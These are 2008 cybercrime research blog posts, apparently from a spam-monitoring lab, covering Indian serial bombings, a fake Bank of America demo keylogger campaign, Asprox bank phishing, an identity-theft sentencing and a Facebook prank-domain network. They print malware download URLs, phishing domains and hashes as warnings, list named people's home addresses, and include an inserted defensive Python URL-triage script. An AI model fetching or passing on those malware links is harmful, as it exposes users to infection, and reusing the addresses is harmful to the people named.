Thursday, November 27, 2008

Mumbai Bombings: Coordinated Bombings in India are Nothing New

The Mumbai bombings are getting non-stop coverage on all the news channels this morning, but they seem to be missing one really crucial element that anyone who does terrorism research could easily point out:

Coordinated Bombings in India are Nothing New!

The only thing new here is the targeting of westerners.

For those who are coming to this realization recently, please forgive a diversion from our normal Cyber Crime topics to explain.

The most telling revelations about the current bombing will be to see the construction of the bombs, and none of the media outlets has that level of information right now.

The National Security Guard's National Bomb Data Centre keeps statistics on bombings in India. During 2007 there were 376 IED blasts and a total of 530 bombing incidents.

October 30, 2008 - The Assam Bombings


10 - 18 blasts kill 84, 470 injured


In the city of Guwahati, Assam, crowded shops in Pan Bazar and Fancy Bazar were hit with grenade attacks, while a car bomb went off at Ganeshguri. 41 were killed in Guwahati, 21 in Kokrajhar, and 15 in Barpeta. The explosions all occurred within 15 minutes, and Assam police chief Mathur says most of the bombs were planted in cars. While the original attack was claimed by "Islamic Security Force-Indian Mujahideen" via text message, and original attribution was assigned to the Harkat-ul-Jihad-al-Islami (HuJI), investigations later focused on the National Democratic Front of Bodoland (NDFB), a separatist group seeking an independent state for the Bodo people. As the investigations unfolded, it became clear that there were actually three terror groups working together here: the ULFA (the United Liberation Front of Asom), the NDFB, and HuJI. These groups were united as a result of "Operation All Clear", which destroyed more than 30 terrorist camps in the southeastern area of Bhutan. While the Indian Chief of Army Staff, General N.C. Vij, claims that more than 650 militants were neutralized during Operation All Clear, more than 2,000 other militants from these camps scattered to fight another day.

For more on Operation All Clear, see Praveen Kumar's article in "Strategic Analysis", External Linkages and Internal Security: Assessing Bhutan's Operation All Clear (21 page PDF).

Arrests in the Assam bombings continued as recently as last week, when Dipak Basumatary was identified as the NDFB Lieutenant behind the serial bombing. Investigators into the bombing shared details about the bomb according to the South Asia Terrorism Portal. (SATP has the hands-down best publicly available data on India's Terrorist groups)

The investigating agencies had found clues that ULFA and NDFB carried out the Assam serial blast of October 30 with the help of Bangladesh-based HuJI. "We have found that the Bangladesh-based HuJI has provided the expertise to ULFA and NDFB as none of them has the technology to explode such devastating bombs which claimed 84 lives," a Home Ministry official said. Home Ministry sources also added that the government is worried over the fact that the northeast militants have started using a deadly mixture of RDX, ammonium nitrate and plasticised explosives to carry out explosions, which led to greater casualties, something never seen in the past. Though the operation was masterminded by HuJI at the behest of the ISI, the NDFB and ULFA had provided logistical support.

-- see Incidents Involving NDFB

Sep 13, 2008 - New Delhi Bombings


5 bombs kill 30 and injure 100+



Five small bombs went off in the space of 25 minutes in India's capital city.

The New Delhi bombing is similar to the current situation in that an email claiming responsibility was sent. In this case the email came just AFTER the first bombing (see below for some where the email came BEFORE, which is of course much more interesting). The email, which was sent to several television stations, claimed that there would be nine blasts in all, "Within five minutes from now . . . this time with the Message of Death, dreadfully terrorizing you for your sins". The email was quickly traced to a Mumbai suburb, with cooperation from Yahoo (the from address was: Arbi Hindi -- al_arbi_delhi@yahoo.com). It was sent from an open WiFi connection belonging to Christian missionary Kenneth Haywood. "Guru Al-Hindi" was the signature on the email, which matched the emails sent prior to two other bomb attacks. Sunny Vaghela, a cyber-cop in Ahmedabad, shared the details with the IT Examiner for their story Avoid being arrested for sending terror mail:

26JUL2008 - alarbi_gujarat@yahoo.com - sent from 210.211.133.200 - Kenneth Haywood's house in Navi Bombay - an unsecured WiFi router.

31JUL2008 - alarbi_gujarat@yahoo.com - sent from 202.160.162.179 - the Medical College at Vaghodiya, in Gujarat. (This one was sent through a proxy, but was ultimately traced to the given location.)

23AUG2008 - alarbi.alhindi@gmail.com - sent from 121.243.206.151 - Khalsa College at Bombay - another unsecured WiFi router.

13SEP2008 - al_arbi_delhi@yahoo.com - sent from Kamran Power Limited at Bombay - another unsecured WiFi router.

If the current bombing's emails follow the same pattern, it could be an indication that they are related. The most recent email was accompanied by a 13-page document, which is certainly rich for forensic and linguistic analysis!

These earlier emails are thought to have been sent by Abdul Subhan Qureshi, who is called a "crack bomb-maker" after attending SIMI (Students Islamic Movement of India) terror camps from 2006 to 2008 to learn his craft. Before becoming a full-time terrorist, Qureshi worked for Wipro, a computer software company, from which he disappeared in 2001, leaving a letter for his employers saying "I wish to inform you that I have decided to devote one complete year to pursue religious and spiritual matters". Despite the proof now that these were SIMI operations, the emails claimed to be from "Indian Mujahideen". Qureshi is also known as Abdul Subhan Tauqeer and Bilal Qureshi. Qureshi was profiled in The Hindu, reprinted in Rediff as "The Hunt for the Indian Mujahideen's al-Arbi".

On July 30th, an email was sent to the Japanese embassy in Delhi claiming responsibility for the Jaipur and Ahmedabad bombings and stating that the next attack would be in New Delhi.


July 26, 2008 - Ahmedabad


21 bomb blasts - 56 killed and 200+ injured



Just before this series of 21 bomb blasts (some say as high as 30), various media outlets received an email saying "Await 5 minutes for the revenge of Gujarat" and "In the name of Allah the Indian Mujahideen strike again! Do whatever you can, within 5 minutes from now, feel the terror of Death!" The fourteen page email had many threats, but also said "Have you forgotten the evening of July 11, 2006 so quickly and so easily?" The fullest version of the email text I can find so far is on the website Islamic Terrorism in India.

Similar to the current event, a second set of bombs went off at hospitals one hour after the initial bombs. (See for example: The Tribune of Chandigarh). Some reports say four hospitals were targeted.

SIMI leader Abul Bashar Qasmi was arrested as the mastermind behind the July 26, 2008 bombings. (AKA Mufti Abu Bashir). Qasmi was arrested on August 16th, and it was reported on August 17th that he had confessed to his involvement in the blasts in Ahmedabad, and was still being questioned regarding Jaipur.


July 25, 2008 - Bangalore


7 bombs - 2 killed and 20 injured



While these bombings were highly coordinated, the intensity of the bombs used indicated simplistic explosive devices, very different from those above. Could this have been an effort to divert anti-terror forces' attention prior to the bombings which followed the next day? The explosives were based on "gelatin sticks" used in quarry blasting.

Another observation is that this bomb run targeted the IT sector (40% of Information Technology businesses in India are in Bangalore), and the current attack is in the heart of India's financial center. Is this a targeting of key infrastructure sectors?

Police originally said that this attack looked like the work of Harkat-ul-Jihad al Islami. Bangladeshi national Mohammad Hakim was taken into custody on July 29th in conjunction with this attack. He admitted that he was trained in bomb making by Mohammad Ansari, who is also a Bangladeshi national.

On September 25th, a SIMI operative named Mohammad Samee Bagewadi, aka Mohammad Samee, was arrested in conjunction with this attack. He had attended SIMI training camps in Castle Rock, Vagamon, and other camps. He was a close associate of SIMI leaders Safdar Hussain Nagori, Hafeez Hussain, Abu Bashar, and others.


May 13, 2008 - Jaipur


eight bombs - 80 killed and 150 injured



The bombs were created using RDX and ammonium nitrate, and filled with ball bearings. Several of the bombs were attached to bicycles.

No one claimed responsibility initially, but the following day an email was sent to various television stations which contained a photo of one of the bicycles used in the bombs, and a close-up of the bicycle showing its serial number. The email came from guru_alhindi_jaipur@yahoo.co.uk and said that the Indian government must stop supporting the US in the international arena. It went on that "if you do continue then get ready to face more attacks at important tourist places."

As in the other cases, a SIMI operative, Mohammad Shajid, was held for questioning, and raids were conducted in Jaipur, Ajmer, Fatehpur, Godhpur, Tonk, and Sikar.

On May 27th, a madrassa teacher and a telephone booth operator, Kamil, in Bharatpur were arrested for their roles in the bombing. The teacher, who used the name "Hakimuddin", was from Nagla Imam Khan village and had lived in Bharatpur for two years.

On August 24th, Shahbaz Hussain, a resident of Lucknow, was arrested for his involvement in Jaipur. He was called "a key player in planting the bombs" as well as selecting the team which executed the blasts. Shahbaz had a degree in mass communications and ran a cyber cafe in Maulviganj, and was a "key aide" to Sajid Mansoori, who was the mastermind of this attack.

On August 25th, seven more members from the Kota district were arrested. They were trained in three different terror camps between November 2007 and January 2008, along with SIMI activists Mufti Abu Bashir and Sajid Mansuri.

On September 1st, the Rajasthan Special Investigations Team (SIT) arrested four more for their parts in the Jaipur bombing - Munawar Husain (AKA Muzaffar Husain), Atiqur Rehman (AKA Abdul Hakim), Nadeem Akhtar (AKA Yaminuddin), and Mohammed Iliyas (AKA Mohammed Husain).

On September 7th, Mohammad Sohail and Azam from Jodhpur were arrested for their role in helping to generate funds for the Jaipur attacks.

On September 19th, two terrorists involved in the Jaipur, Ahmedabad, Hyderabad, and New Delhi blasts were killed when their flat was raided by the Delhi Police Special Cell. Mohammad Fakruddin (AKA Sajed) and Mohammad Bashir (AKA Atiq) were both killed, while two others escaped. Inspector Mohan Chand Sharma, a police officer involved in the raid, was also killed in the firefight.

August 25, 2007 - Hyderabad


2 bombs - 42 killed and 50 injured



While 2 bombs were detonated, 19 other bombs were found, fitted with timers, at bus stops, cinemas, bridges, and a water fountain. The bombs which were detonated went off during a laser light show in a public park.


Sep 8, 2006 - Malegaon


3 blasts killed at least 37 people and injured at least 100



Police found that the explosives used were a mix of RDX, ammonium nitrate, and fuel oil, which is the same mixture used in the July 11, 2006 Mumbai train bombings. Most of those killed were gathered at a mosque where Friday prayers were being held.

http://us.rediff.com/news/2006/sep/08nashik.htm?q=tp&file=.htm


July 11, 2006 - Mumbai Railway


7 bombs - 200 killed



Mar 7, 2006 - Varanasi


28 killed, 101 injured



Oct 29, 2005 -


49 killed, 200+ injured



Aug 25, 2003 - Mumbai


2 car bombs - 52 killed, 150 injured



Sep 24, 2002 - Akshardham temple in Gujarat


31 killed, 79 wounded, hostages taken



Feb 14, 1998 - Coimbatore


13 bombs in 11 locations - 46 dead, 200 wounded

Wednesday, November 26, 2008

Bank of America Demo Account - DO NOT CLICK

Beginning on November 25th, the UAB Spam Data Mine has been receiving messages claiming to be from Bank of America which will explain to us how to use our new "Webbanking-2009" interface. Following the link in these email messages will plant a keylogger trojan on your computer. All of your userids and passwords will be sent to the criminals.

The spammed email messages look like this:

BANK OF AMERICA CORPORATION NOTICE:

New online banking account interface "Bank of America Webbanking-2009" will be available after December 12, 2008.
Please take a look on the new account features demo page.
Bank of America provides our clients with a Demo Account to learn how to use new account interface.
You will learn how to work with the Demo Account Station below.
This link will let you know all news in the Future Online Banking with Bank of America.

DEMO ACCOUNT OVERVIEW>>

2008 Bank of America Corporation.



Why would anyone think of doing an online Demo Account malware campaign? Well, it's because the real Bank of America has invited its customers to view a demo of its new Free Online Banking.

Here's the REAL Bank of America "DEMO":



The URL for the real demo is:

http://www.bankofamerica.com/onlinebanking/demo2/flash-model.cfm

What is most malware about today? It's about SOCIAL ENGINEERING. Can the criminal convince the victim that he is trustworthy by imitating someone or something that the victim is likely to trust? What is more trustworthy than your bank? So when the bank sends its customers an invitation to view a demo of its new Free Online Banking, the criminal follows suit.

Here are some of the Subject lines of the emails the criminal is sending:

  • Bank of America - Demo Account
  • Bank of America - DEMO ACCOUNT not working
  • Bank of America - Demo Account Set Up
  • Bank of America - Demo Account Setup
  • Bank of America - demo account traders
  • Bank of America - full access privileges for your DEMO account
  • Bank of America - learn how to trade with the Demo Dealer Station below
  • Bank of America - New Demo Account, Try for FREE
  • Bank of America - Open A Demo Account
  • Bank of America - provides our Bank of America - clients with a Demo Account to "paper trade" the Forex market.
  • Bank of America - register for a Demo Account to use new features.
  • Bank of America - Setting Up Your Demo Bank of America Account
  • Bank of America - Sign In.My Business Account Demo.
  • Bank of America - Sign In.My Business Account Demo.
  • Bank of America - The demo is best viewed with your browser
  • Bank of America - Try A Free Demo Account!
  • Bank of America - using a demo account
  • Bank of America - View Demo Account's professional profile
  • Bank of America - View Demo of Prime Account
  • Bank of America - View Site View demo website
  • Bank of America - We Give You The Tools You Need.
  • Bank of America - We Give You The Tools You Need. Try A Free Demo Account!
  • Bank of America - your Demo Account username and passcodes will be generated and emailed to you.


Each email has a ridiculously long URL, such as:


http://boundary.launchpad.profile.default.businesslogin.psrxthfblsvjtgz.version.disbursements.privacy.xkfyereogv.frerins.com/demo.htm?/type/arekeninginfo/VERIFY.htm?LOGIN=XTHABCDvJTgzmiOXkEfgHeOgv&refer=WXYandZlSvJTgz

The super-long URLs are there to cause problems for us good guys when we try to fetch their pages into Windows, or zip them up using WinZip, where we'll occasionally get errors about "path too long". In reality, we can shorten the path dramatically and get the same effect. All of the URLs we've seen can be reduced to these five:

frerins.com/demo.htm
inyans.com/demo.htm
neeunt.com/demo.htm
ieenttio.com/demo.htm
onlineservices777.com/demo.htm

(All of the domains were registered in China - BizCN.com and TodayNIC.com -- all of the websites are being hosted with Fast Flux, or botnet machines. If your computer is part of their botnet, then YOU might be helping to host this website.)

Visiting any of these sites shows you a webpage that looks like this:



which prompts users to download "Adobe_Player9.exe" to view the Demo of their new account.

The first phase of the virus is Adobe_Player9.exe, a tiny dropper of 3,225 bytes. The current version has an MD5 of 2ef0de5993873f26529ac34012eb97d9 and is detected by 17 of 37 products according to a current VirusTotal.com report.

The second phase of the virus is downloaded from the URL:

http://silviocash.com/usp.exe

That part of the virus does all the work and plants the keylogger and rootkit. This file is 59,392 bytes in size and has an MD5 of 227c31e1b0e4867bcaefe86a674a6981. Although VirusTotal lists 10 out of 37 products detecting it in this VirusTotal.com report, it's clear that most of these AVs actually do not know what this is, even if they may think it looks suspicious.

AhnLab, Ikarus, Microsoft, and NOD32 know what this virus is. The first three call it "Ursnif" and the last calls it "Papras". That is an accurate description. AVG, McAfee+Artemis, Norman, and SecureWeb mark it as suspicious based on the fact that it is packed. (AVG calls it "Pakes", which I believe just means "packed file".)

After becoming infected, a new Windows Service called "new_drv.sys" will be running on the computer, but will be hidden from most Windows processes. (For example, doing a directory listing, even at a DOS prompt, will not show the file, and listing running processes, for instance in Task Manager, will also not show the file. That's the job of the rootkit function, to hide the existence of the new program from Windows.)

Anytime Internet Explorer is active, userids and passwords, and really anything else that is entered into an online form, are sent to the criminal.

This is the same family of malware which we have warned about so many times in the past -- Papras is the common virus name for all of the "Digital Certificate" malware, and "URSnif" is the name of the routines which do keylogging and send the keys to the badguy in this particular way. We've been talking about Digital Certificates all the way back to our May 6th Digital Certificate Alert! story.

The combination of the old Digital Certificate keylogger with the fake AdobePlayer to see a video began with the Obama acceptance speech video, as we reported the day after the election in our story Computer Virus Masquerades as Obama Acceptance Speech.

Friday, November 21, 2008

AsProx: The Phisher King?

The most spammed phish on the planet took a brief respite after the McColo network was shut down, but the Phisher King is back again.

We see ten thousand or more reports per day of the Asprox spammed phish, and sadly this has been going on non-stop for as long as we can remember, with the brief exception of last week.

The typical scenario is that ten domain names are chosen and used to spam URLs which contain a high degree of randomization. Abbey Bank has been their favorite target for nearly all of 2008. The first "word" of the URL is followed by a number, then the brand name, then a random string, and then the domain name. The path portion of the URL is consistent for each brand currently spammed. Following the path there is a question mark, and then what seems like random characters, but which actually can be decoded into the email address of the person who received the spam. (We'll leave the encoded email address portion off in our examples).

The "Abbey" path for some time has been "/CentralLogonWeb/Confirm?"



The current "Associated Bank" path is "/web_bank/confirm.asp?"



http://myonlineaccounts0.abbey.co.uk.html650963.input2.cc/CentralLogonWeb/Confirm?srvid=
http://myonlineaccounts0.abbey.co.uk.http60319982.code11.ca/CentralLogonWeb/Confirm?update=
http://myonlineaccounts1.abbey.co.uk.doc618591.root71.ws/CentralLogonWeb/Confirm?confirm=
http://myonlineaccounts1.abbey.co.uk.fast35837924.3update.eu/CentralLogonWeb/Confirm?file=
http://myonlineaccounts2.abbeynational.co.uk.browse9701521.sslweb5.bz/CentralLogonWeb/Confirm?version=
http://myonlineaccounts2.abbey-national.co.uk.comm2053275.code11.ca/CentralLogonWeb/Confirm?service=
http://myonlineaccounts2.abbey-national.co.uk.control790833.3update.eu/CentralLogonWeb/Confirm?cipher=
http://myonlineaccounts2.abbeynational.co.uk.err9962057184.5version.mobi/CentralLogonWeb/Confirm?debug=
http://ww2.abbeynational.com.server3610179.input2.cc/CentralLogonWeb/Confirm?bin=
http://ww2.abbeynational.com.sslcom670006.8locate.tk/CentralLogonWeb/Confirm?lang=
http://ww2.abbeynational.com.sys2481.offset9.name/CentralLogonWeb/Confirm?check=

http://bolb1.associatedbank.com.pif02.jp/web_bank/confirm.asp?log-in=
http://bolb1.associatedbank.com.root71.ws/web_bank/confirm.asp?version=
http://bolb1.associatedbank.com.sslweb5.bz/web_bank/confirm.asp?spool=
http://bolb1.associatedbank.com.sys17.name/web_bank/confirm.asp?set=

http://www8.associatedbank.com.sslcom5.cc/web_bank/confirm.asp?tag=
http://www8.associatedbank.com.sys17.name/web_bank/confirm.asp?locate=
http://www8.associatedbank.com.sys17.name/web_bank/confirm.asp?offset=
http://www8.associatedbank.com.sys17.name/web_bank/confirm.asp?script=
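As an added example (not the blog's own tooling), the following Python reduces both the long decoy URL from the Bank of America "demo account" campaign above and the Asprox bank phish URLs to the domain the criminal actually registered, and flags any hostname that carries a real bank's domain as a decoy label rather than as its real registrable domain. The brand list, the Asprox hostname regex, and the naive "last two labels" registrable-domain rule are assumptions made for this example, as are the sample URLs, which are copied from this page.

```python
"""Reduce randomized phishing/malware URLs to the registrable domain and flag
brand-decoy hostnames (Bank of America dropper links and Asprox bank phish).

Assumptions for this example: the registrable domain is the last two labels
of the hostname (true for every domain quoted on this page, but a production
tool should use the Public Suffix List), and the Asprox hostname shape is
<word><number>.<brand domain>[.<word><number>].<registrable domain>.
"""
import re
from urllib.parse import urlsplit

# Constructed sample set: URLs quoted on this page plus the real bank for contrast.
SAMPLE_URLS = [
    "http://boundary.launchpad.profile.default.businesslogin.psrxthfblsvjtgz.version."
    "disbursements.privacy.xkfyereogv.frerins.com/demo.htm?/type/arekeninginfo/VERIFY.htm"
    "?LOGIN=XTHABCDvJTgzmiOXkEfgHeOgv&refer=WXYandZlSvJTgz",
    "http://myonlineaccounts0.abbey.co.uk.html650963.input2.cc/CentralLogonWeb/Confirm?srvid=",
    "http://ww2.abbeynational.com.sslcom670006.8locate.tk/CentralLogonWeb/Confirm?lang=",
    "http://bolb1.associatedbank.com.pif02.jp/web_bank/confirm.asp?log-in=",
    "http://www8.associatedbank.com.sys17.name/web_bank/confirm.asp?offset=",
    "http://www.bankofamerica.com/onlinebanking/demo2/flash-model.cfm",  # legitimate
]

# Brand domains the spammers embed as decoy labels (assumed list for this example).
BRAND_DOMAINS = (
    "abbey.co.uk", "abbeynational.co.uk", "abbey-national.co.uk",
    "abbeynational.com", "associatedbank.com", "bankofamerica.com",
)

# Asprox hostname shape; the middle <word><number> label is absent on the
# Associated Bank URLs, so it is optional.
ASPROX_HOST = re.compile(
    r"^(?P<prefix>[a-z]+\d+)\."
    r"(?P<brand>[a-z][a-z0-9.-]*?)\."
    r"(?:(?P<random>[a-z]+\d+)\.)?"
    r"(?P<domain>[a-z0-9-]+\.[a-z]+)$"
)

# The path is fixed per brand, as the post notes.
BRAND_PATHS = {
    "abbey": "/CentralLogonWeb/Confirm",
    "associatedbank": "/web_bank/confirm.asp",
}


def _split(url: str):
    return urlsplit(url if "://" in url else "http://" + url)


def registrable_domain(host: str) -> str:
    """Last two labels of the hostname (naive; see module docstring)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def shorten(url: str) -> str:
    """Drop decoy subdomain labels and the query string, keeping the path:
    the long Bank of America link collapses to 'frerins.com/demo.htm'."""
    parts = _split(url)
    return registrable_domain(parts.hostname or "") + parts.path


def spoofed_brand(host: str):
    """Return the bank domain embedded inside `host` when it is only a decoy
    label, i.e. not the suffix the hostname actually resolves under."""
    host = host.lower().rstrip(".")
    dotted = "." + host + "."
    for brand in BRAND_DOMAINS:
        if "." + brand + "." in dotted and host != brand and not host.endswith("." + brand):
            return brand
    return None


def classify_asprox(url: str):
    """Return (brand family, registrable domain) when the URL fits the Asprox
    hostname shape AND the brand's fixed path, otherwise None."""
    parts = _split(url)
    m = ASPROX_HOST.match((parts.hostname or "").lower())
    if not m:
        return None
    brand = m.group("brand")
    family = next((f for f in BRAND_PATHS if f in brand.replace("-", "")), None)
    if family is None or parts.path != BRAND_PATHS[family]:
        return None
    return family, m.group("domain")


def triage(urls):
    """Summarise a batch: one row per URL with its reduced form and verdicts."""
    rows = []
    for url in urls:
        host = _split(url).hostname or ""
        rows.append({
            "short": shorten(url),
            "decoy_brand": spoofed_brand(host),
            "asprox": classify_asprox(url),
        })
    return rows


if __name__ == "__main__":
    for row in triage(SAMPLE_URLS):
        print(row)
```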

Just in the last twenty-four hours, we saw more than 25,000 variations of these URL patterns.

How does the Phisher King keep his domains alive? Part of it is his use of a wide and ever-shifting set of Registrars. For example, consider today's domains:

Abbey Domains:

sslweb5.bz
code11.ca (registered 29oct08 with Internic.ca)
input2.cc (registered 06NOV08 with Moniker)
2r2cw3a8u.com (registered 12NOV08 with XIN NET Technology)
3jk2p84x1.com (registered 12NOV08 with XIN NET Technology)
topmango.com (registered in 2001 with TuCows)
3update.eu (registered 06NOV08 with PublicDomainRegistry.com)
ide08.gs (registered 12NOV08 with Key-Systems)
48filt.jp (funky .jp whois gives no useful data)
4logon.jp (funky .jp whois gives no useful data)
pif02.jp (funky .jp whois gives no useful data)
5version.mobi (registered 06NOV08 with Directi Internet Solutions)
25uid.name (registered 06NOV08 with Directi Internet Solutions)
sys17.name (registered 05NOV08 with UK2 Group)
8locate.tk ("locked" by the clueless idiots at "Dot TK" with the phish live)
15load.tv (registered 04NOV08 with UK2 Group)
17gdi.tv (registered 11NOV08 with UK2 Group)
manage5.tv (registered 29OCT08 with UK2 Group)
root71.ws (registered 06NOV08 with Directi Internet Solutions)
udp96.ws (registered 04NOV08 with Directi Internet Solutions)

Associated Domains:

sslweb5.bz (error)
code11.ca (registered 29OCT08 with Internic.ca Corp)
input2.cc (registered 06NOV08 with Moniker Online Services)
6tagid.com (registered 05NOV08 with Moniker Online Services)
3update.eu (registered 06NOV08 with PublicDomainRegistry.com)
ide08.gs (registered 12NOV08 with Key-Systems)
login5.gs (registered 30OCT08 with Key-Systems)
1server.jp (registered 04NOV08 - whois.jprs.jp)
48filt.jp (registered 30OCT08 - whois.jprs.jp)
4logon.jp (registered 31OCT08 - whois.jprs.jp)
asp29.jp (registered 12NOV08 - whois.jprs.jp)
log-in1.jp (registered 27OCT08 - whois.jprs.jp)
pif02.jp (registered 06NOV08 - whois.jprs.jp)
5version.mobi (registered 06NOV08 with Directi Internet Solutions)
25uid.name (registered 06NOV08 with Directi Internet Solutions)
sys17.name (registered 05NOV08 with UK2 Group Ltd)
8default.net (registered 05NOV08 with Moniker Online Services)
8locate.tk (dot.tk does odd things with domains)
15load.tv (registered 04NOV08 with UK2 Group)
17gdi.tv (registered 11NOV08 with UK2 Group)
manage5.tv (registered 29OCT08 with UK2 Group)
root71.ws (registered 06NOV08 with Directi Internet Solutions)
udp96.ws (registered 04NOV08 with Directi Internet Solutions)




That's just the beginning though. Then we have the problem of the nameservers and Fast Flux hosting. While most domains have two or three nameservers, these domains have as many as 19. ns1.sslweb5.bz, ns2.sslweb5.bz, ns3.sslweb5.bz . . . all the way up to ns19.sslweb5.bz.

The IP addresses used for the nameservers are compromised home computers running the Asprox malware. Without the knowledge of these computers' owners, they provide nameserver resolution for the phishing domains. Just as an example, the following IP addresses are all currently acting as nameservers for the Asprox phishing sites:


Each one of these IPs provides name services for dozens of domains used by this criminal. Currently they are serving:

The Nameservers are used to direct email recipients to other infected computers where they are shown the fake bank pages. (Those computers are actually acting as a "proxy" to load the real phishing data from yet another location.)

In addition to the phishing pages, the other machines in the botnet also provide infection services.

The current domains being used for infection are:

www.berjke.ru
and
www.81dns.ru

Google Safe Browsing won't let you visit either of those sites, because they have been "an intermediary for the infection of 770 sites including ssaga-g.com, csmfilter.co.kr, parenthesis-mykonos.com". Google Safe Browsing goes on to answer the question "Has this site hosted malware?" by saying "Yes, this site has hosted malicious software over the past 90 days. It infected 3324 domains including csmfilter.co.kr, sarangsae.com, istanbulihl1991.com."

Checking Google Safe Browsing for one of those sites shows things like:

"Of the 423 pages we tested on this site over the past 90 days, 130 pages resulted in malicious software being downloaded and installed without user consent. The last time Google visited the site was 2008-11-21, and the last time suspicious content was found on the site was on 2008-11-21.

Malicious software includes 168 scripting exploits, 28 exploits, 4 trojans. Successful infection resulted in an average of 2 new processes on the target machine.

8 domains appear to be functioning as intermediaries for distributing malware to visitors of this site, including egyptgood.cn, 81dns.ru, berjke.ru"


At the current moment, there are 18,400 "drive-by" infection sites just with that script site loaded in Google. Some of the infected sites are hotels, ski resorts, chemical companies, motorcycle sites, real estate sites, nail salons, churches, and the government of Ohio (survey.workforce411.ohio.gov has many infected pages).

There have been MILLIONS of these pages . . . I'll have more details soon....

Thursday, November 20, 2008

Igor Klopov sentenced

It's nice to finish a story sometimes, so this brief entry will do that. Back in August 2007, we did a story called How Far Would You Travel for $7 Million describing the undercover sting where Igor Klopov was lured to the United States to be arrested.

Charges were brought against Klopov and described as:

The defendants have been charged with Conspiracy in the Fourth Degree, Grand Larceny in the First Degree, Attempted Grand Larceny in the First Degree, Money Laundering in the First Degree, Attempted Money Laundering in the First Degree, Grand Larceny in the Second Degree, Attempted Grand Larceny in the Second Degree, Money Laundering in the Second Degree, Attempted Money Laundering in the Second Degree, Grand Larceny in the Third Degree, Attempted Grand Larceny in the Third Degree, Identity Theft in the First Degree, Forgery in the Second Degree, Criminal Possession of a Forged Instrument in the Second Degree, Criminal Possession of Stolen Property in the Fourth Degree and Criminal Possession of Forgery Devices. Money Laundering in the First Degree and Grand Larceny in the First Degree are both class B felonies which are punishable by up to 25 years in prison.


So, with all those charges, what kind of sentence was actually passed down by New York Supreme Court Justice Gregory Carro?

Three and a half to Ten and a half years. WHAT?!?!?!! 3.5 Years!?!?!?

Apparently sentences are slashed if you're really, really, really sorry.

The story has been used as a case study even before the sentence was reached, with Assistant District Attorney Jeremy Glickman doing lectures on the case, from a Summer Intern "Brown Bag" Lunch to a National White Collar Crimes Summit presentation called Piercing the Iron Cyber Curtain: Case Studies in International Financial Crimes.

Choosing victims from the Forbes Magazine 400 Richest People list, Klopov had several successful capers, with the largest being the theft of more than $1 million from a Fidelity Investments account belonging to a Silicon Valley couple, before he got stung going for his biggest case yet.

In his last attempt, the target was Charles Wyly. Wyly, who is George W. Bush's 9th largest "lifetime donor", is best known in computer circles as the guy who sold Sterling Software and Sterling Commerce for $8 Billion back in 2000, but the family has also dealt in Oil and Restaurants, and is currently behind a "Green Electricity" company called GreenMountain. Klopov managed to convince JP Morgan Chase to send a checkbook from Wyly's Home Equity Line of Credit account to Charles Dalton in Houston. Dalton then took the checkbook to the group's forger, Watson, who used it to write a $7 Million check to a gold broker in New York. JP Morgan Chase confirmed the check had not been issued by asking Mr. Wyly about it. The US Secret Service, working with the New Yorkers, managed to convince Klopov to come to the US to pick up the gold in person, which is when he got busted, back in May 2007.

More details about the case, including some other fascinating high-end identity theft attempts, are available from the New York County District Attorney's Office's initial press release, where they describe Klopov recruiting forgers and impersonators on online job sites.


His co-conspirators have all pleaded guilty:

IGOR KLOPOV, 5/12/83
5 Gospitaly
Moscow, Russia

JAMES DALTON, 3/28/74
517 Northwood Drive
Conroe, Texas

RICHARD HOSKINS, 9/1/78
415 Spring Street
London, Kentucky

WESTLEY WATSON, 10/2/70
8810 Pembroke Avenue
Detroit, Michigan

LEE MONOPOLI, 9/12/66
4200 NW 12th Avenue
Ft. Lauderdale, Florida

Monday, November 17, 2008

Facebook Users Beware

I'm looking into an interesting Facebook phenomenon this morning. Several of my "friends" on Facebook have received messages that look like these:

---

hey did u know your facebook pic was just featured on kchangblab.com

hey has anyone told you ur facebook pic was just featured on srcate.com

hey do u realize your default image is displayed on moreprofilestrade.com

did you know your profile pic is all over brightium.com

has anyone told u ur facebook pic was just featured on gabblemodule.com

---

The question is, "What's causing these posts?" Did these messages really come from their friends? Are they being generated by malware on their friends' computers? Or has someone compromised their passwords?

While I wait for these friends-of-friends to respond, I thought I would dig in to the domain names in question.

The WHOIS data for each says the domains are owned by

Adam Arzoomanian bulletinpics@gmail.com
375 E Harmon
Las Vegas
NV
89109
US

According to DomainTools.com, bulletinpics@gmail.com has registered 491 different domain names!

On some, the address has an extra line that says:
"The site is a fun prank - the pic is of a monkey"

The phone number Adam uses, 702.922.1911, belongs to Spin Night Club Promotions in Las Vegas, Nevada. That address is across the street from the Hard Rock Hotel, and is used by the "Alexis Park Resort", which is a "Spin Promotion LV Company", Las Vegas' Premiere Upscale Hip Hop Venue. We've also been able to confirm that Adam Arzoomanian is a real person and is really associated with Spin Night Club at Alexis Park. For instance, this story from Las Vegas Weekly:

This new nightclub project is just one of many for Arzoomanian, who will also oversee the Alexis Park’s gaming initiatives, building a casino resort on the two lots behind the current property as well as expanding the suites and villa according to a three- to five-year plan. “This is just the tip of the iceberg for Alexis Park,” says Arzoomanian, who adds that of all the projects in the works, designing Spin is his hobby. At present, no rendering exists for the new club. “It’s in my head.”
(Full Story)

The question remains whether the Real Adam knows anything about all of his domains . . . The number listed has a full voicemail box. Using the voicemail directory, we find that there are many, many people who use the same voicemail service, including cleaning services, ticket services, hearing aid services, etc.


------
Let's see what other domains we can find for Adam Arzoomanian . . .


All of those domains (and probably many more) forward to the single domain:

friends-to-friends-only.com (created Oct 8, 2008 on Moniker Online)

which uses a frameset to pull the actual content from:

http://rotating-destination.com/taf/taf.html

(TAF = Tell A Friend)

Rotating Destination is a TuCows registered domain created on September 29, 2008, with "protected" WHOIS information. Compete.com says the site gets 140,000 unique US-based visitors per month, and Quantcast ranks it as the 12,588th most popular site on the Internet.

After the "login" portion (and ask yourself again, WHY would anyone need to ask for a password here?) the action forwards to yet another website:

http://www.this-isnt-personal.com/taf/picmatch.html

We've sent an email link to this blog entry to bulletinpics@gmail.com and are waiting for a response. As mentioned above, we weren't able to leave Adam a voicemail at his listed number, but the people at Alexis Park were much more helpful. Adam is no longer the GM at their resort. I've left a voicemail for their webmaster/computer guy at the resort, and hopefully that will get us somewhere further. It should be enough to get Moniker to "unregister" all the domains, we hope . . .

The site CLAIMS to be a "prank" site, where ultimately your friend sees a picture of a monkey and is supposed to giggle about how funny it is that their profile was said to be a monkey.

Question. Why would someone pay to register 491 different domain names to display a joke picture of a monkey?

Here's the sequence of webpages . . .

